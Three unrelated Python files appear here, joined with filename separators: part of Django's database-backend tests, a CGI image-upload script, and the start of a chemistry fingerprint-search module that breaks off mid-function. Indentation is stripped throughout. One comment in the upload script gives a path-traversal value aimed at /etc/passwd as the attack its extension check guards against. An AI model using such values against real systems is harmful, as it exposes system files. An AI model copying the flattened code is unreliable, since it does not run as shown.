the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""Test an m2m save of a model with a long name and a long m2m field name doesn't error as on Django >=1.2 this now uses object saves. Ref #8901"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""Test that sequence resetting as part of a flush with model with long name and long pk name doesn't error. Ref #8901"""
        # A full flush is expensive for the full test suite, so we dig into the
        # internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
# Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
    Zero as the id for an AutoField should raise an exception in MySQL, because
    MySQL does not allow zero as an autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
imageUpload.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
################################################################################
# Argon Design Ltd. Project P8010 Spock
# (c) Copyright 2018 Argon Design Ltd. All rights reserved.
#
# Module: Gumpifier
# Author : Patrick Taylor
################################################################################
"""
This CGI script takes the foreground and background images uploaded by the user and saves them to disk.
It then sends a URL to the saved image to:
	* The user - we can't access their local version because of browser security features
* The TF server - to begin its processing (e.g. segmentation)
Refer to here for a CGI programming guide: https://www.tutorialspoint.com/python/python_cgi_programming.htm
CGI args:
JSON. Either {'fgimage': data} or {'bgimage': data}
CGI return:
String. URL to uploaded image.
"""
import cgi, os
import cgitb; cgitb.enable() # Traceback enable
from TF_interface import sendData
import threading
import hashlib, time, random
form = cgi.FieldStorage()
os.chdir("..")
# Get the file item (data and name)
# Set the command keyword we send to the TF server
if 'fgimage' in form:
fileitem = form['fgimage']
command = 'sgtF'
elif 'bgimage' in form:
fileitem = form['bgimage']
command = 'sgtB'
# Test if the file was uploaded
if fileitem.filename: # fileitem.filename is actually a path
# Save the photo
extension = os.path.basename(fileitem.filename).split('.')[-1]
# Try to guard against an insertion attack by testing that the extension is correct
# E.g. extension might be "/../....../etc/passwd"
if extension.lower() not in ['jpg', 'jpeg', 'png']: # https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types/Complete_list_of_MIME_types
message = "ERROR:Filetype"
else:
hashName = hashlib.md5(str(time.time()).encode("utf8") + str(random.random()).encode("utf8")).hexdigest() + "." + extension
savedPath = os.path.join("storage", hashName)
# Use technique here to ensure strict permissions: https://stackoverflow.com/a/45368120
with open(os.open(savedPath, os.O_CREAT | os.O_WRONLY, 0o644), 'wb') as outputFile:
outputFile.write(fileitem.file.read())
# Set the TF server segmenting the image. We're not waiting for a response from this one so use threading
threading.Thread(target=sendData, args=(savedPath, command)).start()
# Return the file where the image is stored
message = savedPath
else:
message = "ERROR:No file uploaded"
# Return stuff to client
print("""Content-type: text/html
{}""".format(message))
|
subsim_search.py
|
# -*- coding: utf-8 -*-
from __future__ import annotations
import time
import multiprocessing
import os
import warnings
from collections import defaultdict
from io import BytesIO
from typing import List, Optional, Tuple, Union
import pystow
import rdkit
from rdkit import Chem
import pandas as pd
from tqdm import tqdm
from rdkit.Chem.rdSubstructLibrary import SubstructLibrary, PatternHolder, CachedMolHolder
try:
import cupy
except ImportError as e:
cupy = e
try:
import tables as tb
except ImportError as e:
tb = e
try:
import FPSim2
    from FPSim2.io.backends.pytables import create_schema, BATCH_WRITE_SIZE, calc_popcnt_bins_pytables, sort_db_file
from FPSim2.io.backends.base import BaseStorageBackend
from FPSim2.base import BaseEngine
from FPSim2.FPSim2 import FPSim2Engine
from FPSim2.FPSim2Cuda import FPSim2CudaEngine
from FPSim2.io.chem import load_molecule
except ImportError as e:
FPSim2 = e
# Placeholders
BaseStorageBackend = str
BaseEngine = str
FPSim2Engine = str
FPSim2CudaEngine = str
from .fingerprint import *
from .utils.mol_reader import MolSupplier
from .utils.IO import locate_file, get_num_rows_in_file, process_data_version
class FPSubSim2:
def __init__(self):
if isinstance(tb, ImportError) and isinstance(FPSim2, ImportError):
raise ImportError('Some required dependencies are missing:\n\ttables, FPSim2')
elif isinstance(tb, ImportError):
raise ImportError('Some required dependencies are missing:\n\ttables')
elif isinstance(FPSim2, ImportError):
raise ImportError('Some required dependencies are missing:\n\tFPSim2')
elif isinstance(BaseStorageBackend, str) or \
isinstance(BaseEngine, str) or \
isinstance(FPSim2Engine, str) or \
isinstance(FPSim2CudaEngine, str):
raise ImportError('Some FPSim2 components could not be loaded')
self.version = None
self.is3d = None
self.sd_file = None
self.h5_filename = None
def create_from_papyrus(self,
is3d: bool = False,
version: str = 'latest',
outfile: Optional[str] = None,
fingerprint: Optional[Union[Fingerprint, List[Fingerprint]]] = MorganFingerprint(),
root_folder: Optional[str] = None,
progress: bool = True,
njobs: int = 1):
"""Create an extended FPSim2 database from Papyrus data.
:param is3d: Toggle the use of non-standardised (3D) data (default: False)
:param version: version of the Papyrus dataset to be used
:param outfile: filename or filepath of output database
:param fingerprint: fingerprints to be calculated, if None uses all available
:param root_folder: folder containing the bioactivity dataset (default: pystow's home folder)
:param progress: whether progress should be shown
:param njobs: number of concurrent processes (-1 for all available logical cores)
:return:
"""
# Set version
self.version = process_data_version(version=version, root_folder=root_folder)
# Determine default paths
if root_folder is not None:
os.environ['PYSTOW_HOME'] = os.path.abspath(root_folder)
source_path = pystow.join('papyrus', self.version, 'structures')
# Find the file
filenames = locate_file(source_path.as_posix(),
f'*.*_combined_{3 if is3d else 2}D_set_with{"out" if not is3d else ""}_stereochemistry.sd*')
sd_file = filenames[0]
        total = get_num_rows_in_file(filetype='structures', is3D=is3d, version=self.version, root_folder=root_folder)
self.create(sd_file=sd_file, outfile=outfile, fingerprint=fingerprint, total=total, progress=progress, njobs=njobs)
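    # A minimal usage sketch (illustrative only; 'fpss.h5' and njobs=4 are
    # example values, and the Papyrus files are assumed to be available):
    #
    #   fpss = FPSubSim2()
    #   fpss.create_from_papyrus(is3d=False, version='latest', outfile='fpss.h5', njobs=4)
    #   # or reuse a previously generated library:
    #   fpss.load('fpss.h5')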
def create(self,
sd_file: str,
outfile: Optional[str] = None,
fingerprint: Union[Fingerprint, List[Fingerprint]] = MorganFingerprint(),
progress: bool = True,
total: Optional[int] = None,
njobs: int = 1):
"""Create an extended FPSim2 database to deal with multiple similarity
fingerprints and handle full substructure search (subgraph isomorphism)
and load it when finished.
        :param sd_file: SD file containing the chemical structures
:param outfile: filename or filepath of output database
:param fingerprint: fingerprints to be calculated, if None uses all available
:param progress: whether progress should be shown
:param total: number of molecules for progress display
:param njobs: number of concurrent processes (-1 for all available logical cores)
"""
self.sd_file = sd_file
# Set outfile name if not supplied
if outfile is None:
self.h5_filename = f'Papyrus_{self.version}_FPSubSim2_{3 if self.is3d else 2}D.h5'
else:
self.h5_filename = outfile
# Set fingerprints if not supplied
if fingerprint is not None:
if isinstance(fingerprint, list):
for x in fingerprint:
if not isinstance(x, Fingerprint):
raise ValueError(f'{x} is not a supported fingerprint')
elif not isinstance(fingerprint, Fingerprint):
raise ValueError(f'{fingerprint} is not a supported fingerprint')
else:
